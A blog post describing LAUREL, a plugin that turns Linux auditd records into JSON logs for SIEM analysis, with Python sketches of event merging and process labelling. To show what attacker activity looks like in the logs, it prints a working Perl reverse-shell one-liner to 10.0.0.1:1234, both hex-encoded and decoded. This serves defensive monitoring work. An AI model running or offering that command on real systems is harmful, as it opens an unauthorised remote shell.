Tuesday, July 26, 2022

Transform Linux Audit Logs For SIEM Usage

LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.

Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes obvious at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while preserving all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).
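The two problems named above (records of one event spread over several lines, and EXECVE arguments that auditd hex-encodes) are what a post-processor has to undo. The following is an added illustration, not LAUREL's code: a minimal Python merger that groups raw auditd records by message id, decodes hex-encoded argv entries, collapses a0..aN into an ARGV list and emits one JSON object per event when its EOE record arrives. The sample records are constructed, modelled on the perl example on this page.

```python
import json
import re
from collections import defaultdict

# Constructed sample: one event split across four records sharing one message id.
SAMPLE_LINES = [
    'type=SYSCALL msg=audit(1626611363.720:348501): arch=c000003e syscall=59 '
    'success=yes exit=0 ppid=3190631 pid=3190640 uid=1000 comm="perl" exe="/usr/bin/perl"',
    'type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" '
    'a2=75736520536F636B65743B24693D2231302E302E302E31223B',
    'type=PATH msg=audit(1626611363.720:348501): item=0 name="/usr/bin/perl" inode=1234',
    'type=EOE msg=audit(1626611363.720:348501): ',
]

RECORD_RE = re.compile(r'^type=(\w+) msg=audit\(([\d.]+:\d+)\): ?(.*)$')
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S*)')

def decode_value(key, raw):
    """Quoted values are literal; an unquoted a0..aN value is hex because the
    argument contained characters outside auditd's safe set."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    if re.fullmatch(r'a\d+', key) and re.fullmatch(r'(?:[0-9A-Fa-f]{2})+', raw):
        return bytes.fromhex(raw).decode('utf-8', errors='replace')
    return int(raw) if raw.isdigit() else raw

def merge_events(lines):
    """Group records by message id; emit one dict per event once EOE arrives
    (which is why the EOE record must not be suppressed by the ruleset)."""
    pending, events = defaultdict(dict), []
    for line in lines:
        m = RECORD_RE.match(line)
        if not m:
            continue
        rtype, msgid, body = m.groups()
        if rtype == 'EOE':
            events.append({'ID': msgid, **pending.pop(msgid, {})})
            continue
        fields = {k: decode_value(k, v) for k, v in FIELD_RE.findall(body)}
        if rtype == 'EXECVE':  # collapse a0..aN into a single ARGV list
            fields['ARGV'] = [fields.pop(f'a{i}') for i in range(fields['argc'])]
        if rtype == 'PATH':    # several PATH records may belong to one event
            pending[msgid].setdefault('PATH', []).append(fields)
        else:
            pending[msgid][rtype] = fields
    return events

if __name__ == '__main__':
    for event in merge_events(SAMPLE_LINES):
        print(json.dumps(event))
```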

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with the feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event records are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, ID points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as labels to the process that caused the event. These labels can be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that sets keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Along with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_mgmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This kind of monitoring also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting a single event.
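To make the label propagation described in this section concrete, here is an added example (not LAUREL's code, and the LABEL_KEYS/PROPAGATE_LABELS settings are a hypothetical stand-in for its configuration): a process table that turns the software_mgmt audit key into a label on apt-get, inherits it down to dpkg and the apt method helpers, and attaches a PARENT_INFO object of the shape shown above. The events are constructed, already-merged execve events in arrival order.

```python
# Hypothetical configuration (not LAUREL's real config syntax): audit keys that
# become process labels, and which of those labels child processes inherit.
LABEL_KEYS = {"software_mgmt"}
PROPAGATE_LABELS = {"software_mgmt"}

# Constructed execve events; pid/ppid/comm/exe/key come from the SYSCALL record.
SAMPLE_EVENTS = [
    {"id": "1.100:1", "pid": 100, "ppid": 50, "comm": "apt-get", "exe": "/usr/bin/apt-get", "key": "software_mgmt"},
    {"id": "1.200:2", "pid": 101, "ppid": 100, "comm": "dpkg", "exe": "/usr/bin/dpkg", "key": None},
    {"id": "1.300:3", "pid": 102, "ppid": 100, "comm": "http", "exe": "/usr/lib/apt/methods/http", "key": None},
    {"id": "1.400:4", "pid": 103, "ppid": 102, "comm": "sh", "exe": "/usr/bin/dash", "key": None},
    {"id": "1.500:5", "pid": 200, "ppid": 50, "comm": "vim", "exe": "/usr/bin/vim", "key": None},
]

class ProcessTable:
    """Keeps the last execve per live pid so each event can be annotated at the
    source instead of being joined against earlier events in the SIEM."""

    def __init__(self):
        self.procs = {}  # pid -> {"id", "comm", "exe", "ppid", "labels"}

    def annotate(self, ev):
        parent = self.procs.get(ev["ppid"])
        # Inherit only labels configured for propagation, then add the label
        # derived from this event's own audit key (if it is a configured key).
        labels = set(parent["labels"] & PROPAGATE_LABELS) if parent else set()
        if ev["key"] in LABEL_KEYS:
            labels.add(ev["key"])
        self.procs[ev["pid"]] = {"id": ev["id"], "comm": ev["comm"], "exe": ev["exe"],
                                 "ppid": ev["ppid"], "labels": labels}
        out = dict(ev, LABELS=sorted(labels))
        if parent:  # same shape as the PARENT_INFO object shown above
            out["PARENT_INFO"] = {"ID": parent["id"], "comm": parent["comm"],
                                  "exe": parent["exe"], "ppid": parent["ppid"]}
        return out

    def forget(self, pid):
        """Call on process exit so a recycled pid does not inherit stale labels."""
        self.procs.pop(pid, None)

def label_events(events):
    """Annotate a stream of events in order; returns the enriched copies."""
    table = ProcessTable()
    return [table.annotate(ev) for ev in events]
```

A process whose parent was never seen executing (here pid 50) gets no PARENT_INFO, and an unrelated process started from the same parent (vim) stays unlabelled.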

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <[email protected]>.
